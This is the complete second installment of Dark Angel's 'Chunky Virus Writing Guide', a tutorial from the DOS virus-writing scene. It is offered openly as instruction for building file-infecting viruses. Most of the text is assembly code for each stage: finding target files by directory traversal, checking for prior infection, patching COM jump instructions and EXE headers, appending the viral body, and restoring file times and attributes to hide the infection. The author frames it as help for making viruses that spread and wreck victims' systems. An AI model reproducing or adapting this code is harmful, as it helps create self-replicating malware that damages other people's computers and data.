The Replicator
Dark Angel's Chunky Virus Writing Guide
INSTALLMENT II: THE REPLICATOR
In the last installment of my Virus Writing Guide, I explained the various parts of a virus and went into a brief discussion about each. In this issue, I shall devote all my attention towards the replicator portion of the virus. I promised code and code I shall present.
However, I shall digress for a moment because it has come to my attention that some mutant copies of the first installment were inadvertently released. These copies did not contain a vital section concerning the calculation of offsets.
You never know where your variables and code are going to wind up in memory. If you think a bit, this should be pretty obvious. Since you are attaching the virus to the end of a program, the location in memory is going to be changed, i.e. it will be larger by the size of the infected program. So, to compensate, we must take the change in offset from the original virus, or the delta offset, and add that to all references to variables.
Instructions that use displacement, i.e. relative offsets, need not be changed. These instructions are the JA, JB, JZ class of instructions, JMP SHORT, JMP label, and CALL. Thus, whenever possible use these in favor of, say, JMP FAR PTR.
Suppose in the following examples, si is somehow loaded with the delta offset.
Replace
mov ax, counter
With
mov ax, word ptr [si+offset counter]
Replace
mov dx, offset message
With
lea dx, [si+offset message]
You may be asking, "how the farg am I supposed to find the delta offset!?"
It is simple enough:
call setup
setup:
pop si
sub si, offset setup
An explanation of the above fragment is in order. CALL setup pushes the location of the next instruction, i.e. offset setup, onto the stack. Next, this location is POPed into si. Finally, the ORIGINAL offset of setup (calculated at compile-time) is subtracted from si, giving you the delta offset. In the original virus, the delta offset will be 0, i.e. the new location of setup equals the old location of setup.
It is often preferable to use bp as your delta offset, since si is used in string instructions. Use whichever you like. I'll randomly switch between the two as suits my mood.
Now back to the other stuff...
A biological virus is a parasitic "organism" which uses its host to spread itself. It must keep the host alive to keep itself "alive." Only when it has spread everywhere will the host die a painful, horrible death. The modern electronic virus is no different. It attaches itself to a host system and reproduces until the entire system is fucked. It then proceeds and neatly wrecks the system of the dimwit who caught the virus.
Replication is what distinguishes a virus from a simple trojan. Anybody can write a trojan, but a virus is much more elegant. It acts almost invisibly, and catches the victim off-guard when it finally surfaces. The first question is, of course, how does a virus spread? Both COM and EXE infections (along with sample infection routines) shall be presented.
There are two major approaches to virii: runtime and TSR. Runtime virii infect, yup, you guessed it, when the infected program is run, while TSR virii go resident when the infected programs are run and hook the interrupts and infect when a file is run, open, closed, and/or upon termination (i.e. INT 20h, INT 21h/41h). There are advantages and disadvantages to each. Runtime virii are harder to detect as they don't show up on memory maps, but, on the other hand, the delay while it searches for and infects a file may give it away. TSR virii, if not properly done, can be easily spotted by utilities such as MAPMEM, PMAP, etc, but are, in general, smaller since they don't need a function to search for files to infect. They are also faster than runtime virii, also because they don't have to search for files to infect. I shall cover runtime virii here, and TSR virii in a later installment.
Here is a summary of the infection procedure:
- Find a file to infect.
- Check if it meets the infection criteria.
- See if it is already infected and if so, go back to 1.
- Otherwise, infect the file.
- Cover your tracks.
I shall go through each of these steps and present sample code for each. Note that although a complete virus can be built from the information below, you cannot merely rip the code out and stick it together, as the fragments are from various different virii that I have written. You must be somewhat familiar with assembly. I present code fragments; it is up to you to either use them as examples or modify them for your own virii.
STEP 1 - FIND A FILE TO INFECT
Before you can infect a file, you have to find it first! This can be a bottleneck in the performance of the virus, so it should be done as efficiently as possible. For runtime virii, there are a few possibilities. You could infect files in only the current directory, or you could write a directory traversal function to infect files in ALL directories (only a few files per run, of course), or you could infect files in only a few select directories. Why would you choose to only infect files in the current directory? It would appear to limit the efficacy of the infections. However, this is done in some virii either to speed up the virus or to shorten the code size.
Here is a directory traversal function. It uses recursion, so it is rather slow, but it does the job. This was excerpted with some modifications from The Funky Bob Ross Virus [Beta].
traverse_fcn proc near
push bp ; Create stack frame
mov bp,sp
sub sp,44 ; Allocate space for DTA
call infect_directory ; Go to search & destroy routines
mov ah,1Ah ;Set DTA
lea dx,word ptr [bp-44] ; to space allotted
int 21h ;Do it now!
mov ah, 4Eh ;Find first
mov cx,16 ;Directory mask
lea dx,[si+offset dir_mask] ; *.*
int 21h
jmp short isdirok
gonow:
cmp byte ptr [bp-14], '.' ; Is first char == '.'?
je short donext ; If so, loop again
lea dx,word ptr [bp-14] ; else load dirname
mov ah,3Bh ; and changedir there
int 21h
jc short donext ; Do next if invalid
inc word ptr [si+offset nest] ; nest++
call near ptr traverse_fcn ; recurse directory
donext:
lea dx,word ptr [bp-44] ; Load space allocated for DTA
mov ah,1Ah ; and set DTA to this new area
int 21h ; 'cause it might have changed
mov ah,4Fh ;Find next
int 21h
isdirok:
jnc gonow ; If OK, jmp elsewhere
cmp word ptr [si+offset nest], 0 ; If root directory
; (nest == 0)
jle short cleanup ; then Quit
dec word ptr [si+offset nest] ; Else decrement nest
lea dx, [si+offset back_dir]; '..'
mov ah,3Bh ; Change directory
int 21h ; to previous one
cleanup:
mov sp,bp
pop bp
ret
traverse_fcn endp
; Variables
nest dw 0
back_dir db '..',0
dir_mask db '*.*',0
The code is self-explanatory. Make sure you have a function called infect_directory which scans the directory for possible files to infect and makes sure it doesn't infect already-infected files. This function, in turn, calls infect_file which infects the file.
Note, as I said before, this is slow. A quicker method, albeit not as global, is the "dot dot" method. Hellraiser showed me this neat little trick. Basically, you keep searching each directory and, if you haven't infected enough, go to the previous directory (dot dot) and try again, and so on. The code is simple.
dir_loopy:
call infect_directory
lea dx, [bp+dotdot]
mov ah, 3bh ; CHDIR
int 21h
jnc dir_loopy ; Carry set if in root
; Variables
dotdot db '..',0
Now you must find a file to infect. This is done (in the fragments above) by a function called infect_directory. This function calls FINDFIRST and FINDNEXT a couple of times to find files to infect. You should first set up a new DTA. NEVER use the DTA in the PSP (at 80h) because altering that will affect the command-line parameters of the infected program when control is returned to it. This is easily done with the following:
mov ah, 1Ah ; Set DTA
lea dx, [bp+offset DTA] ; to variable called DTA (wow!)
int 21h
Where DTA is a 42-byte chunk of memory. Next, issue a series of FINDFIRST and FINDNEXT calls:
mov ah, 4Eh ; Find first file
mov cx, 0007h ; Any file attribute
lea dx, [bp+offset file_mask]; DS:[DX] --> filemask
int 21h
jc none_found
found_another:
call check_infection
mov ah, 4Fh ; Find next file
int 21h
jnc found_another
none_found:
Where file_mask is DBed to either '*.EXE',0 or '*.COM',0. Alternatively, you could FINDFIRST for '*.*',0 and check if the extension is EXE or COM.
STEP 2 - CHECK VERSUS INFECTION CRITERIA
Your virus should be judicious in its infection. For example, you might not want to infect COMMAND.COM, since some programs (i.e. the puny FluShot+) check its CRC or checksum on runtime. Perhaps you do not wish to infect the first valid file in the directory. Ambulance Car is an example of such a virus. Regardless, if there is some infection criteria, you should check for it now. Here's example code checking if the last two letters are 'ND', a simple check for COMMAND.COM:
cmp word ptr [bp+offset DTA+35], 'DN' ; Reverse word order
jz fail_check
STEP 3 - CHECK FOR PREVIOUS INFECTION
Every virus has certain characteristics with which you can identify whether a file is infected already. For example, a certain piece of code may always occur in a predictable place. Or perhaps the JMP instruction is always coded in the same manner. Regardless, you should make sure your virus has a marker so that multiple infections of the same file do not occur. Here's an example of one such check (for a COM file infector):
mov ah,3Fh ; Read first three
mov cx, 3 ; bytes of the file
lea dx, [bp+offset buffer] ; to the buffer
int 21h
mov ax, 4202h ; SEEK from EOF
xor cx, cx ; DX:CX = offset
xor dx, dx ; Returns filesize
int 21h ; in DX:AX
sub ax, virus_size + 3
cmp word ptr [bp+offset buffer+1], ax
jnz infect_it
bomb_out:
mov ah, 3Eh ; else close the file
int 21h ; and go find another
In this example, BX is assumed to hold a file handle to the program to be checked for infection and virus_size equals the size of the virus. Buffer is assumed to be a three-byte area of empty space. This code fragment reads the first three bytes into buffer and then compares the JMP location (located in the word beginning at buffer+1) to the filesize If the JMP points to virus_size bytes before the EOF, then the file is already infected with this virus. Another method would be to search at a certain location in the file for a marker byte or word. For example:
mov ah, 3Fh ; Read the first four
mov cx, 4 ; bytes of the file into
lea dx, [bp+offset buffer] ; the buffer.
int 21h
cmp byte ptr [buffer+3], infection_id_byte ; Check the fourth
jz bomb_out ; byte for the marker
infect_it:
STEP 4 - INFECT THE FILE
This is the "guts" of the virus, the heart of the replicator. Once you have located a potential file, you must save the attributes, time, date, and size for later use. The following is a breakdown of the DTA:
Offset Size What it is
0h 21 BYTES Reserved, varies as per DOS version
15h BYTE File attribute
16h WORD File time
18h WORD File date
1Ah DWORD File size
1Eh 13 BYTES ASCIIZ filename + extension
As you can see, the DTA holds all the vital information about the file that you need. The following code fragment is a sample of how to save the info:
lea si, [bp+offset DTA+15h] ; Start from attributes
mov cx, 9 ; Finish with size
lea di, [bp+offset f_attr] ; Move into your locations
rep movsb
; Variables needed
f_attr db ?
f_time dw ?
f_date dw ?
f_size dd ?
You can now change the file attributes to nothing through INT 21h/Function 43h/Subfunction 01h. This is to allow infection of system, hidden, and read only files. Only primitive (or minimal) virii cannot handle such files.
lea dx, [bp+offset DTA+1eh] ; DX points to filename in
mov ax, 4301h ; DTA
xor cx, cx ; Clear file attributes
int 21h ; Issue the call
Once the attributes have been annihilated, you may open the file with callous impunity. Use a handle open in read/write mode.
lea dx, [bp+offset DTA+1eh] ; Use filename in DTA
mov ax, 3d02h ; Open read/write mode
int 21h ; duh.
xchg ax, bx ; Handle is more useful in
; BX
Now we come to the part you've all been waiting for: the infection routine. I am pleased to present code which will handle the infection of COM files. Yawn, you say, I can already do that with the information presented in the previous installment. Ah, but there is more, much more. A sample EXE infector shall also be presented shortly.
The theory behind COM file infection was covered in the last installment, so I shall not delve into the details again. Here is a sample infector:
; Sample COM infector. Assumes BX holds the file handle
; Assume COM file passes infection criteria and not already infected
mov ah, 3fh
lea dx, [bp+buffer1]
mov cx, 3
int 21h
mov ax, 4200h ; Move file pointer to
xor cx, cx ; the beginning of the
xor dx, dx ; file
int 21h
mov byte ptr [bp+buffer2], 0e9h ; JMP
mov ax, word ptr [bp+f_size]
sub ax, part1_size ; Usually 3
mov word ptr [bp+buffer2+1], ax ; offset of JMP
; Encode JMP instruction to replace beginning of the file
mov byte ptr [bp+buffer2], 0e9h ; JMP
mov ax, word ptr [bp+f_size]
sub ax, part1_size ; Usually 3
mov word ptr [bp+buffer2+1], ax ; offset of JMP
; Write the JMP instruction to the beginning of the file
mov ah, 40h ; Write CX bytes to
mov cx, 3 ; handle in BX from
lea dx, [bp+buffer2] ; buffer -> DS:[DX]
int 21h
mov ax, 4202h ; Move file pointer to
xor cx, cx ; end of file
xor dx, dx
int 21h
mov ah, 40h ; Write CX bytes
mov cx, endofvirus - startofpart2 ; Effective size of virus
lea dx, [bp+startofpart2] ; Begin write at start
int 21h
; Variables
buffer1 db 3 dup (?) ; Saved bytes from the
; infected file to restore
; later
buffer2 db 3 dup (?) ; Temp buffer
After some examination, this code will prove to be easy to understand. It starts by reading the first three bytes into a buffer. Note that you could have done this in an earlier step, such as when you are checking for a previous infection. If you have already done this, you obviously don't need to do it again. This buffer must be stored in the virus so it can be restored later when the code is executed.
EXE infections are also simple, although a bit harder to understand. First, the thoery. Here is the format of the EXE header:
Ofs Name Size Comments
00 Signature 2 bytes always 4Dh 5Ah (MZ)
*02 Last Page Size 1 word number of bytes in last page
*04 File Pages 1 word number of 512 byte pages
06 Reloc Items 1 word number of entries in table
08 Header Paras 1 word size of header in 16 byte paras
0A MinAlloc 1 word minimum memory required in paras
0C MaxAlloc 1 word maximum memory wanted in paras
*0E PreReloc SS 1 word offset in paras to stack segment
*10 Initial SP 1 word starting SP value
12 Negative checksum 1 word currently ignored
*14 Pre Reloc IP 1 word execution start address
*16 Pre Reloc CS 1 word preadjusted start segment
18 Reloc table offset 1 word is offset from start of file)
1A Overlay number 1 word ignored if not overlay
1C Reserved/unused 2 words
* denotes bytes which should be changed by the virus
To understand this, you must first realise that EXE files are structured into segments. These segments may begin and end anywhere. All you have to do to infect an EXE file is tack on your code to the end. It will then be in its own segment. Now all you have to do is make the virus code execute before the program code. Unlike COM infections, no program code is overwritten, although the header is modified. Note the virus can still have the V1/V2 structure, but only V2 needs to be concatenated to the end of the infected EXE file.
Offset 4 (File Pages) holds the size of the file divided by 512, rounded up. Offset 2 holds the size of the file modulo 512. Offset 0Eh holds the paragraph displacement (relative to the end of the header) of the initial stack segment and Offset 10h holds the displacement (relative to the start of the stack segment) of the initial stack pointer. Offset 16h holds the paragraph displacement of the entry point relative to the end of the header and offset 14h holds the displacement entry point relative to the start of the entry segment. Offset 14h and 16h are the key to adding the startup code (the virus) to the file.
Before you infect the file, you should save the CS:IP and SS:SP found in the EXE header, as you need to restore them upon execution. Note that SS:SP is NOT stored in Intel reverse-double-word format. If you don't know what I'm talking about, don't worry; it's only for very picky people. You should also save the file length as you will need to use that value several times during the infection routine. Now it's time to calculate some offsets! To find the new CS:IP and SS:SP, use the following code. It assumes the file size is loaded in DX:AX.
mov bx, word ptr [bp+ExeHead+8] ; Header size in paragraphs
; ^---make sure you don't destroy the file handle
mov cl, 4 ; Multiply by 16. Won't
shl bx, cl ; work with headers > 4096
; bytes. Oh well!
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
; Now DX:AX is loaded with file size minus header size
mov cx, 10h ; DX:AX/CX = AX Remainder DX
div cx
This code is rather inefficient. It would probably be easier to divide by 16 first and then perform a straight subtraction from AX, but this happens to be the code I chose. Such is life. However, this code does have some advantages over the more efficient one. With this, you are certain that the IP (in DX) will be under 15. This allows the stack to be in the same segment as the entry point, as long as the stack pointer is a large number.
Now AX*16+DX points to the end of code. If the virus begins immediately after the end of the code, AX and DX can be used as the initial CS and IP, respectively. However, if the virus has some junk (code or data) before the entry point, add the entry point displacement to DX (no ADC with AX is necessary since DX will always be small).
mov word ptr [bp+ExeHead+14h], dx ; IP Offset
mov word ptr [bp+ExeHead+16h], ax ; CS Displacement in module
The SP and SS can now be calculated. The SS is equal to the CS. The actual value of the SP is irrelevant, as long as it is large enough so the stack will not overwrite code (remember: the stack grows downwards). As a general rule, make sure the SP is at least 100 bytes larger than the virus size. This should be sufficient to avoid problems.
mov word ptr [bp+ExeHead+0Eh], ax ; Paragraph disp. SS
mov word ptr [bp+ExeHead+10h], 0A000h ; Starting SP
All that is left to fiddle in the header is the file size. Restore the original file size from wherever you saved it to DX:AX. To calculate DX:AX/512 and DX:AX MOD 512, use the following code:
mov cl, 9 ; Use shifts again for
ror dx, cl ; division
push ax ; Need to use AX again
shr ax, cl
adc dx, ax ; pages in dx
pop ax
and ah, 1 ; mod 512 in ax
mov word ptr [bp+ExeHead+4], dx ; Fix-up the file size in
mov word ptr [bp+ExeHead+2], ax ; the EXE header.
All that is left is writing back the EXE header and concatenating the virus to the end of the file. You want code? You get code.
mov ah, 3fh ; BX holds handle
mov cx, 18h ; Don't need entire header
lea dx, [bp+ExeHead]
int 21h
call infectexe
mov ax, 4200h ; Rewind to beginning of
xor cx, cx ; file
xor dx, dx
int 21h
mov ah, 40h ; Write header back
mov cx, 18h
lea dx, [bp+ExeHead]
int 21h
mov ax, 4202h ; Go to end of file
xor cx, cx
xor dx, dx
int 21h
mov ah, 40h ; Note: Only need to write
mov cx, part2size ; part 2 of the virus
lea dx, [bp+offset part2start] ; (Parts of virus
int 21h ; defined in first
; installment of
; the guide)
Note that this code alone is not sufficient to write a COM or EXE infector. Code is also needed to transfer control back to the parent program. The information needed to do this shall be presented in the next installment. In the meantime, you can try to figure it out on your own; just remember that you must restore all that you changed.
STEP 5 - COVER YOUR TRACKS
This step, though simple to do, is too easily neglected. It is extremely important, as a wary user will be alerted to the presence of a virus by any unnecessary updates to a file. In its simplest form, it involves the restoration of file attributes, time and date. This is done with the following:
mov ax, 5701h ; Set file time/date
mov dx, word ptr [bp+f_date] ; DX = date
mov cx, word ptr [bp+f_time] ; CX = time
int 21h
mov ah, 3eh ; Handle close file
int 21h
mov ax, 4301h ; Set attributes
lea dx, [bp+offset DTA + 1Eh] ; Filename still in DTA
xor ch, ch
mov cl, byte ptr [bp+f_attrib] ; Attribute in CX
int 21h
Remember also to restore the directory back to the original one if it changed during the run of the virus.
WHAT'S TO COME
I have been pleased with the tremendous response to the last installment of the guide. Next time, I shall cover the rest of the virus as well as various tips and common tricks helpful in writing virii. Until then, make sure you look for 40Hex, the official PHALCON/SKISM magazine, where we share tips and information pertinent to the virus community.